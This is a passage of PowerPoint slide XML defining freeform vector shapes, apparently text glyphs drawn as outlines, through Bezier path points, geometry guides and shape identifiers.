                  <a:cubicBezTo>
                    <a:pt x="186" y="122"/>
                    <a:pt x="200" y="94"/>
                    <a:pt x="200" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="32"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="69"/>
                    <a:pt x="25" y="75"/>
                    <a:pt x="33" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="75"/>
                    <a:pt x="51" y="68"/>
                    <a:pt x="51" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="51"/>
                    <a:pt x="49" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="22"/>
                    <a:pt x="104" y="21"/>
                    <a:pt x="109" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="151" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="132"/>
                    <a:pt x="120" y="133"/>
                    <a:pt x="100" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="136"/>
                    <a:pt x="68" y="136"/>
                    <a:pt x="68" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="157"/>
                    <a:pt x="77" y="157"/>
                    <a:pt x="83" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="157"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="260"/>
                    <a:pt x="159" y="295"/>
                    <a:pt x="109" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="295"/>
                    <a:pt x="45" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="36" y="252"/>
                    <a:pt x="36" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="289"/>
                    <a:pt x="49" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="215" y="272"/>
                    <a:pt x="215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4" name="Freeform 1200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72AADE1-7627-4590-A34E-FEF16F9640D6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8005762" y="1558925"/>
              <a:ext cx="87313" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 213 h 311"/>
                <a:gd name="T2" fmla="*/ 215 w 230"/>
                <a:gd name="T3" fmla="*/ 202 h 311"/>
                <a:gd name="T4" fmla="*/ 170 w 230"/>
                <a:gd name="T5" fmla="*/ 202 h 311"/>
                <a:gd name="T6" fmla="*/ 170 w 230"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 153 w 230"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 139 w 230"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 122 w 230"/>
                <a:gd name="T13" fmla="*/ 8 h 311"/>
                <a:gd name="T14" fmla="*/ 2 w 230"/>
                <a:gd name="T15" fmla="*/ 196 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 208 h 311"/>
                <a:gd name="T18" fmla="*/ 15 w 230"/>
                <a:gd name="T19" fmla="*/ 223 h 311"/>
                <a:gd name="T20" fmla="*/ 151 w 230"/>
                <a:gd name="T21" fmla="*/ 223 h 311"/>
                <a:gd name="T22" fmla="*/ 151 w 230"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 114 w 230"/>
                <a:gd name="T25" fmla="*/ 290 h 311"/>
                <a:gd name="T26" fmla="*/ 98 w 230"/>
                <a:gd name="T27" fmla="*/ 300 h 311"/>
                <a:gd name="T28" fmla="*/ 114 w 230"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 206 w 230"/>
                <a:gd name="T31" fmla="*/ 311 h 311"/>
                <a:gd name="T32" fmla="*/ 222 w 230"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 206 w 230"/>
                <a:gd name="T35" fmla="*/ 290 h 311"/>
                <a:gd name="T36" fmla="*/ 170 w 230"/>
                <a:gd name="T37" fmla="*/ 290 h 311"/>
                <a:gd name="T38" fmla="*/ 170 w 230"/>
                <a:gd name="T39" fmla="*/ 223 h 311"/>
                <a:gd name="T40" fmla="*/ 215 w 230"/>
                <a:gd name="T41" fmla="*/ 223 h 311"/>
                <a:gd name="T42" fmla="*/ 230 w 230"/>
                <a:gd name="T43" fmla="*/ 213 h 311"/>
                <a:gd name="T44" fmla="*/ 151 w 230"/>
                <a:gd name="T45" fmla="*/ 202 h 311"/>
                <a:gd name="T46" fmla="*/ 22 w 230"/>
                <a:gd name="T47" fmla="*/ 202 h 311"/>
                <a:gd name="T48" fmla="*/ 137 w 230"/>
                <a:gd name="T49" fmla="*/ 21 h 311"/>
                <a:gd name="T50" fmla="*/ 151 w 230"/>
                <a:gd name="T51" fmla="*/ 21 h 311"/>
                <a:gd name="T52" fmla="*/ 151 w 230"/>
                <a:gd name="T53" fmla="*/ 20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1">
                  <a:moveTo>
                    <a:pt x="230" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="202"/>
                    <a:pt x="220" y="202"/>
                    <a:pt x="215" y="202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="3"/>
                    <a:pt x="167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2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3" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="290"/>
                    <a:pt x="98" y="290"/>
                    <a:pt x="98" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="311"/>
                    <a:pt x="108" y="311"/>
                    <a:pt x="114" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206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2" y="290"/>
                    <a:pt x="206" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215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1" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151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5" name="Freeform 1201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0697917F-B675-456D-87D0-F969B7AAA1BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId197"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8105775" y="1558925"/>
              <a:ext cx="87313" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 213 h 311"/>
                <a:gd name="T2" fmla="*/ 214 w 230"/>
                <a:gd name="T3" fmla="*/ 202 h 311"/>
                <a:gd name="T4" fmla="*/ 169 w 230"/>
                <a:gd name="T5" fmla="*/ 202 h 311"/>
                <a:gd name="T6" fmla="*/ 169 w 230"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 153 w 230"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 139 w 230"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 121 w 230"/>
                <a:gd name="T13" fmla="*/ 8 h 311"/>
                <a:gd name="T14" fmla="*/ 2 w 230"/>
                <a:gd name="T15" fmla="*/ 196 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 208 h 311"/>
                <a:gd name="T18" fmla="*/ 15 w 230"/>
                <a:gd name="T19" fmla="*/ 223 h 311"/>
                <a:gd name="T20" fmla="*/ 150 w 230"/>
                <a:gd name="T21" fmla="*/ 223 h 311"/>
                <a:gd name="T22" fmla="*/ 150 w 230"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 113 w 230"/>
                <a:gd name="T25" fmla="*/ 290 h 311"/>
                <a:gd name="T26" fmla="*/ 98 w 230"/>
                <a:gd name="T27" fmla="*/ 300 h 311"/>
                <a:gd name="T28" fmla="*/ 113 w 230"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 206 w 230"/>
                <a:gd name="T31" fmla="*/ 311 h 311"/>
                <a:gd name="T32" fmla="*/ 221 w 230"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 206 w 230"/>
                <a:gd name="T35" fmla="*/ 290 h 311"/>
                <a:gd name="T36" fmla="*/ 169 w 230"/>
                <a:gd name="T37" fmla="*/ 290 h 311"/>
                <a:gd name="T38" fmla="*/ 169 w 230"/>
                <a:gd name="T39" fmla="*/ 223 h 311"/>
                <a:gd name="T40" fmla="*/ 214 w 230"/>
                <a:gd name="T41" fmla="*/ 223 h 311"/>
                <a:gd name="T42" fmla="*/ 230 w 230"/>
                <a:gd name="T43" fmla="*/ 213 h 311"/>
                <a:gd name="T44" fmla="*/ 150 w 230"/>
                <a:gd name="T45" fmla="*/ 202 h 311"/>
                <a:gd name="T46" fmla="*/ 21 w 230"/>
                <a:gd name="T47" fmla="*/ 202 h 311"/>
                <a:gd name="T48" fmla="*/ 137 w 230"/>
                <a:gd name="T49" fmla="*/ 21 h 311"/>
                <a:gd name="T50" fmla="*/ 150 w 230"/>
                <a:gd name="T51" fmla="*/ 21 h 311"/>
                <a:gd name="T52" fmla="*/ 150 w 230"/>
                <a:gd name="T53" fmla="*/ 20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1">
                  <a:moveTo>
                    <a:pt x="230" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="202"/>
                    <a:pt x="220" y="202"/>
                    <a:pt x="214" y="202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="202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1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3" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="290"/>
                    <a:pt x="98" y="290"/>
                    <a:pt x="98" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="311"/>
                    <a:pt x="108" y="311"/>
                    <a:pt x="113" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="311"/>
                    <a:pt x="221" y="311"/>
                    <a:pt x="221" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="290"/>
                    <a:pt x="212" y="290"/>
                    <a:pt x="206" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214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0" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150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6" name="Freeform 1202">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8698E82-AC7B-41C2-BCD8-D90778283780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8239125" y="1658938"/>
              <a:ext cx="20638" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 55 w 55"/>
                <a:gd name="T1" fmla="*/ 28 h 55"/>
                <a:gd name="T2" fmla="*/ 28 w 55"/>
                <a:gd name="T3" fmla="*/ 0 h 55"/>
                <a:gd name="T4" fmla="*/ 0 w 55"/>
                <a:gd name="T5" fmla="*/ 27 h 55"/>
                <a:gd name="T6" fmla="*/ 27 w 55"/>
                <a:gd name="T7" fmla="*/ 55 h 55"/>
                <a:gd name="T8" fmla="*/ 55 w 55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7" name="Freeform 1203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7589956F-A5BB-40D1-B023-9737963CC6A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId199"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1497012" y="1793875"/>
              <a:ext cx="87313" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 154 h 304"/>
                <a:gd name="T2" fmla="*/ 122 w 230"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 16 w 230"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 230"/>
                <a:gd name="T7" fmla="*/ 11 h 304"/>
                <a:gd name="T8" fmla="*/ 16 w 230"/>
                <a:gd name="T9" fmla="*/ 21 h 304"/>
                <a:gd name="T10" fmla="*/ 32 w 230"/>
                <a:gd name="T11" fmla="*/ 21 h 304"/>
                <a:gd name="T12" fmla="*/ 32 w 230"/>
                <a:gd name="T13" fmla="*/ 283 h 304"/>
                <a:gd name="T14" fmla="*/ 16 w 230"/>
                <a:gd name="T15" fmla="*/ 283 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 294 h 304"/>
                <a:gd name="T18" fmla="*/ 16 w 230"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 122 w 230"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 230 w 230"/>
                <a:gd name="T23" fmla="*/ 154 h 304"/>
                <a:gd name="T24" fmla="*/ 205 w 230"/>
                <a:gd name="T25" fmla="*/ 154 h 304"/>
                <a:gd name="T26" fmla="*/ 112 w 230"/>
                <a:gd name="T27" fmla="*/ 283 h 304"/>
                <a:gd name="T28" fmla="*/ 58 w 230"/>
                <a:gd name="T29" fmla="*/ 283 h 304"/>
                <a:gd name="T30" fmla="*/ 58 w 230"/>
                <a:gd name="T31" fmla="*/ 21 h 304"/>
                <a:gd name="T32" fmla="*/ 112 w 230"/>
                <a:gd name="T33" fmla="*/ 21 h 304"/>
                <a:gd name="T34" fmla="*/ 205 w 230"/>
                <a:gd name="T35" fmla="*/ 15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0" h="304">
                  <a:moveTo>
                    <a:pt x="230" y="154"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="75"/>
                    <a:pt x="188" y="0"/>
                    <a:pt x="122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2" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="283"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="283"/>
                    <a:pt x="0" y="283"/>
                    <a:pt x="0" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="10" y="304"/>
                    <a:pt x="16" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="304"/>
                    <a:pt x="230" y="234"/>
                    <a:pt x="230" y="154"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="154"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="218"/>
                    <a:pt x="172" y="283"/>
                    <a:pt x="112" y="283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="21"/>
                    <a:pt x="205" y="92"/>
                    <a:pt x="205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8" name="Freeform 1204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36ACAF34-DEE7-4FC9-BBCB-559DE7E5E93A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId200"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1601787" y="182880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5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4 w 232"/>
                <a:gd name="T19" fmla="*/ 84 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 232"/>
                <a:gd name="T21" fmla="*/ 156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3 h 219"/>
                <a:gd name="T32" fmla="*/ 131 w 232"/>
                <a:gd name="T33" fmla="*/ 189 h 219"/>
                <a:gd name="T34" fmla="*/ 84 w 232"/>
                <a:gd name="T35" fmla="*/ 198 h 219"/>
                <a:gd name="T36" fmla="*/ 25 w 232"/>
                <a:gd name="T37" fmla="*/ 156 h 219"/>
                <a:gd name="T38" fmla="*/ 154 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 219"/>
                <a:gd name="T40" fmla="*/ 154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6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="129"/>
                    <a:pt x="71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55" name="Freeform 1206">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A246BAF-F636-4374-9415-6F5E67C5250B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1698625" y="1804988"/>
              <a:ext cx="79375" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 208"/>
                <a:gd name="T1" fmla="*/ 216 h 278"/>
                <a:gd name="T2" fmla="*/ 195 w 208"/>
                <a:gd name="T3" fmla="*/ 201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3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6 h 278"/>
                <a:gd name="T38" fmla="*/ 133 w 208"/>
                <a:gd name="T39" fmla="*/ 278 h 278"/>
                <a:gd name="T40" fmla="*/ 208 w 208"/>
                <a:gd name="T41" fmla="*/ 21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1"/>
                    <a:pt x="149" y="257"/>
                    <a:pt x="136" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="257"/>
                    <a:pt x="91" y="227"/>
                    <a:pt x="91" y="213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6"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="261"/>
                    <a:pt x="99" y="278"/>
                    <a:pt x="133" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="278"/>
                    <a:pt x="208" y="258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56" name="Freeform 1207">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A7810F-7E78-4DCE-AA06-3DA3CD81EB4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId202"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1801812" y="182880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5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4 w 232"/>
                <a:gd name="T19" fmla="*/ 84 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 232"/>
                <a:gd name="T21" fmla="*/ 156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3 h 219"/>
                <a:gd name="T32" fmla="*/ 131 w 232"/>
                <a:gd name="T33" fmla="*/ 189 h 219"/>
                <a:gd name="T34" fmla="*/ 84 w 232"/>
                <a:gd name="T35" fmla="*/ 198 h 219"/>
                <a:gd name="T36" fmla="*/ 25 w 232"/>
                <a:gd name="T37" fmla="*/ 156 h 219"/>
                <a:gd name="T38" fmla="*/ 154 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 219"/>
                <a:gd name="T40" fmla="*/ 154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6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="129"/>
                    <a:pt x="71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57" name="Freeform 1208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05DC86E-CC0E-409B-B14A-61C129DE9861}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId203"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2001837" y="182880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5 h 219"/>
                <a:gd name="T8" fmla="*/ 83 w 232"/>
                <a:gd name="T9" fmla="*/ 0 h 219"/>
                <a:gd name="T10" fmla="*/ 14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5 w 232"/>
                <a:gd name="T19" fmla="*/ 84 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 232"/>
                <a:gd name="T21" fmla="*/ 156 h 219"/>
                <a:gd name="T22" fmla="*/ 80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3 h 219"/>
                <a:gd name="T32" fmla="*/ 132 w 232"/>
                <a:gd name="T33" fmla="*/ 189 h 219"/>
                <a:gd name="T34" fmla="*/ 84 w 232"/>
                <a:gd name="T35" fmla="*/ 198 h 219"/>
                <a:gd name="T36" fmla="*/ 25 w 232"/>
                <a:gd name="T37" fmla="*/ 156 h 219"/>
                <a:gd name="T38" fmla="*/ 155 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 219"/>
                <a:gd name="T40" fmla="*/ 155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6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25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58" name="Freeform 1209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70A30AC4-0558-446A-9153-D080C629D5E8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2098675" y="1804988"/>
              <a:ext cx="79375" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 209 w 209"/>
                <a:gd name="T1" fmla="*/ 216 h 278"/>
                <a:gd name="T2" fmla="*/ 196 w 209"/>
                <a:gd name="T3" fmla="*/ 201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3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6 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 278"/>
                <a:gd name="T26" fmla="*/ 66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6 w 209"/>
                <a:gd name="T35" fmla="*/ 84 h 278"/>
                <a:gd name="T36" fmla="*/ 66 w 209"/>
                <a:gd name="T37" fmla="*/ 216 h 278"/>
                <a:gd name="T38" fmla="*/ 134 w 209"/>
                <a:gd name="T39" fmla="*/ 278 h 278"/>
                <a:gd name="T40" fmla="*/ 209 w 209"/>
                <a:gd name="T41" fmla="*/ 21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3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6" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="216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59" name="Freeform 1210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012ACF28-ADA4-48BE-97CF-32B8BF8FCBAC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2298700" y="1804988"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 209 w 209"/>
                <a:gd name="T1" fmla="*/ 216 h 278"/>
                <a:gd name="T2" fmla="*/ 196 w 209"/>
                <a:gd name="T3" fmla="*/ 201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3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6 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 278"/>
                <a:gd name="T26" fmla="*/ 66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6 w 209"/>
                <a:gd name="T35" fmla="*/ 84 h 278"/>
                <a:gd name="T36" fmla="*/ 66 w 209"/>
                <a:gd name="T37" fmla="*/ 216 h 278"/>
                <a:gd name="T38" fmla="*/ 134 w 209"/>
                <a:gd name="T39" fmla="*/ 278 h 278"/>
                <a:gd name="T40" fmla="*/ 209 w 209"/>
                <a:gd name="T41" fmla="*/ 21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3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6" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="216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0" name="Freeform 1211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF6BAA1-DFCD-4F8E-A444-E991981B6A8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2403475" y="182880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5 h 219"/>
                <a:gd name="T8" fmla="*/ 83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5 w 232"/>
                <a:gd name="T19" fmla="*/ 84 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 232"/>
                <a:gd name="T21" fmla="*/ 156 h 219"/>
                <a:gd name="T22" fmla="*/ 80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3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6 h 219"/>
                <a:gd name="T38" fmla="*/ 155 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 219"/>
                <a:gd name="T40" fmla="*/ 155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1" name="Freeform 1212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007CC872-76BA-424E-BC51-AC47DCBE4B5F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2500312" y="1828800"/>
              <a:ext cx="85725" cy="84138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4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5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5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="74"/>
                    <a:pt x="120" y="21"/>
                    <a:pt x="191" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="36"/>
                    <a:pt x="198" y="44"/>
                    <a:pt x="208" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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2" name="Freeform 1213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D308422-B2FA-435E-81D7-376A2513754D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
